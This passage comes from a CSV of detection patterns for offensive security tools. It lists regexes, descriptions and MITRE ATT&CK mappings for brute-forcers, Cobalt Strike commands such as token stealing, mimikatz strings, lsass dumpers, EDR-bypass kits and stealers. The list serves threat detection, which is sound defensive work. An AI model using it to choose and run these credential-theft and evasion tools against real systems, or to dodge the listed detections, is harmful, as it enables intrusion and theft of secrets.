That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","N/A","8","741","263","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z","36307" "*brutespray -*",".{0,1000}brutespray\s\-.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","36308" "*brutespray.exe*",".{0,1000}brutespray.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","36309" "*brutespray.go*",".{0,1000}brutespray\.go.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","36310" "*brutespray/brute*",".{0,1000}brutespray\/brute.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","36311" "*brutespray-output*",".{0,1000}brutespray\-output.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","36312" "*BruteStager.csproj*",".{0,1000}BruteStager\.csproj.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","36313" "*BruteStager.sln*",".{0,1000}BruteStager\.sln.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","36314" "*bruteuser.go*",".{0,1000}bruteuser\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","36315" "*bruteuserCmd*",".{0,1000}bruteuserCmd.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","36316" 
"*BruteX*",".{0,1000}BruteX.{0,1000}","offensive_tool_keyword","BruteX","Automatically brute force all services running on a target. Open ports. Usernames Passwords","T1110","TA0007 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/1N3/BruteX","1","0","N/A","N/A","10","10","2066","613","2024-08-18T23:18:37Z","2015-06-01T22:28:19Z","36317" "*bshinject*",".{0,1000}bshinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","36318" "*bshinject*",".{0,1000}bshinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36319" "*bshspawn*",".{0,1000}bshspawn.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 
- T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","36320" "*bsteal_token*",".{0,1000}bsteal_token.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","36321" "*bsteal_token*",".{0,1000}bsteal_token.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36322" "*btpsupport@protonmail.com*",".{0,1000}btpsupport\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","36323" "*BTW i use ARCH. A - Jeffrey Epstein. R - didnt. C - kill. 
H - himself*",".{0,1000}BTW\si\suse\sARCH\.\sA\s\-\sJeffrey\sEpstein\.\sR\s\-\sdidnt\.\sC\s\-\skill\.\sH\s\-\shimself.{0,1000}","offensive_tool_keyword","PredatorTheStealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/PredatorTheStealer","1","0","N/A","N/A","8","1","11","2","2022-12-06T16:46:33Z","2022-12-06T16:34:43Z","36330" "*bucketloot -*",".{0,1000}bucketloot\s\-.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","0","N/A","N/A","7","5","409","58","2025-01-22T10:48:27Z","2023-07-17T09:06:14Z","36331" "*bucketloot https://*",".{0,1000}bucketloot\shttps\:\/\/.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","0","N/A","N/A","7","5","409","58","2025-01-22T10:48:27Z","2023-07-17T09:06:14Z","36332" "*bucketloot.exe -*",".{0,1000}bucketloot\.exe\s\-.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in 
plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","0","N/A","N/A","7","5","409","58","2025-01-22T10:48:27Z","2023-07-17T09:06:14Z","36333" "*bucketloot.exe https://*",".{0,1000}bucketloot\.exe\shttps\:\/\/.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","0","N/A","N/A","7","5","409","58","2025-01-22T10:48:27Z","2023-07-17T09:06:14Z","36334" "*bucketloot-darwin64*",".{0,1000}bucketloot\-darwin64.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","#linux","N/A","7","5","409","58","2025-01-22T10:48:27Z","2023-07-17T09:06:14Z","36335" "*bucketloot-freebsd64*",".{0,1000}bucketloot\-freebsd64.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","N/A","7","5","409","58","2025-01-22T10:48:27Z","2023-07-17T09:06:14Z","36336" 
"*BucketLoot-master*",".{0,1000}BucketLoot\-master.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","N/A","7","5","409","58","2025-01-22T10:48:27Z","2023-07-17T09:06:14Z","36337" "*bucketloot-openbsd64*",".{0,1000}bucketloot\-openbsd64.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","N/A","7","5","409","58","2025-01-22T10:48:27Z","2023-07-17T09:06:14Z","36338" "*bucketloot-windows32.exe*",".{0,1000}bucketloot\-windows32\.exe.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","N/A","7","5","409","58","2025-01-22T10:48:27Z","2023-07-17T09:06:14Z","36339" "*bucketloot-windows64.exe*",".{0,1000}bucketloot\-windows64\.exe.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search 
for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","N/A","7","5","409","58","2025-01-22T10:48:27Z","2023-07-17T09:06:14Z","36340" "*buffer_overflow.py*",".{0,1000}buffer_overflow\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","36341" "*bugch3ck/SharpAltSecIds*",".{0,1000}bugch3ck\/SharpAltSecIds.{0,1000}","offensive_tool_keyword","SharpAltSecIds","Shadow Credentials via altSecurityIdentities - Enables attackers to add altSecurityIdentities entries to an account - linking it to an X.509 certificate for authentication. This allows them to impersonate the targeted account and authenticate using the associated certificate","T1098.003 - T1556.002 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/bugch3ck/SharpAltSecIds","1","1","N/A","N/A","9","1","12","3","2022-05-30T13:50:05Z","2022-05-30T13:40:17Z","36342" "*-Build $RandomAttackPath*",".{0,1000}\-Build\s\$RandomAttackPath.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/mvelazc0/BadZure/","1","0","N/A","N/A","5","5","451","26","2025-04-10T03:20:03Z","2023-05-05T04:52:21Z","36343" "*Build Evil Lsass Twin*",".{0,1000}Build\sEvil\sLsass\sTwin.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - 
T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","36344" "*build Freeze.go*",".{0,1000}build\sFreeze\.go.{0,1000}","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","0","N/A","N/A","N/A","10","1437","187","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z","36345" "*build GoStompy.go*",".{0,1000}build\sGoStompy\.go.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","36346" "*build -o LastenServer*",".{0,1000}build\s\-o\sLastenServer.{0,1000}","offensive_tool_keyword","Lastenzug","Socka4a proxy based on websockets","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/codewhitesec/Lastenzug","1","0","#linux","N/A","10","10","218","33","2022-10-18T08:55:46Z","2022-07-21T12:57:52Z","36347" "*build SourcePoint.go*",".{0,1000}build\sSourcePoint\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","36348" "*build Supernova.go*",".{0,1000}build\sSupernova\.go.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","0","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","36349" "*Build with love for POC only*",".{0,1000}Build\swith\slove\sfor\sPOC\sonly.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - 
T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","36350" "*build ZipExec.go*",".{0,1000}build\sZipExec\.go.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","N/A","N/A","9","10","1026","153","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z","36351" "*build.ps1 -commands * -profile *selfcontained -singlefile*",".{0,1000}build\.ps1\s\-commands\s.{0,1000}\s\-profile\s.{0,1000}selfcontained\s\-singlefile.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","36352" "*build.ps1 -profiles * -commands * -compressed*",".{0,1000}build\.ps1\s\-profiles\s.{0,1000}\s\-commands\s.{0,1000}\s\-compressed.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","36353" "*build/breg.cna*",".{0,1000}build\/breg\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 